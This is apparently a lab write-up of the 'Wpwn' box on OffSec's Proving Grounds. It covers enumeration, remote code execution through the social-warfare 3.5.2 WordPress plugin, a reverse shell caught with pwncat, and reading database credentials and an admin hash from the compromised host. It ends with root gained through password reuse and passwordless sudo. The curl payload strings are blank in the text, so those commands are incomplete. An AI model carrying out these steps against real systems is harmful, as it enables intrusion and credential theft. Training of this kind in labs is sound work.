Proving Grounds | Wpwn

Hi amazing hackers from around the world, back again with another write up of a box. This time it’s from OffSec’s Proving Grounds. If you would like to check out more write ups please do check my GitLab repository

Try harder! Credits to Offensive Security



22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Basic information that you’ll get.


  • Apache 2.4.38
  • WordPress 5.5
  • robots.txt contains :
/secret -> 404
# haha, just kidding. Focus on real stuff ma boi

Looks like it’s just a fake robots.txt, that’s fine keep enumerating!


FeroxBuster is a tool to discover directories and files on a server, it’s pretty similar to GoBuster but it’s much more faster and it has emojis!

  • Found /wordpress
200        3l        5w       23c
301 9l 28w 320c
  • Now that we know we’re running WordPress we can run another tool.


wpscan is a tool made by wpscanteam to enumerate and test the security of the CMS WordPress.

  • 1 user identified, admin
  • Plugins detected social-warfare version 3.5.2


Now we have some information of our target, lets do some research!

curl ""
  • We’ll see the hostname in the response
<!DOCTYPE html>
<html lang="en-US">
  • Let’s get a reverse shell.
  • Payload needs to be URL encoded.
curl ""pwncat is a tool similar to netcat, but it has more features than netcat.[15:09:39] Welcome to pwncat 🐈!                                                            
[15:10:28] received connection from
[15:10:31] upgrading from /usr/bin/dash to /usr/bin/bash
[15:10:34] registered new host w/ db

Privilege Escalation

Now that we have a shell in the machine, it’s time to escalate our privileges!

  • We are user www-data, need password for sudo -l
  • Found MySQL credentials for DB.
/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );
  • Found hash for admin in wp_users table.
| user_login | user_pass |
| admin | $P$BoIPbgc5i8WpBP2HzqoeQW3jfRVAyU1 |
  • Hash is Wordpress, mode 400
  • While we’re trying to crack the password, we should look around more.
  • Found local.txt in /var/www

One thing that I like to check is that usually the DB password is reused for the user password

  • We have one user which is takis
  • DB password is reused for user takis. We are now user takis.
  • Check sudo -l
User takis may run the following commands on wpwn:     (ALL) NOPASSWD: ALL

We’ll look at that, we don’t even need to find another vector to escalate to root.

  • We can run sudo on anything, run sudo bash to gain root privileges.
  • proof.txt in /root

And that’s all we’re root!

Student that loves FOSS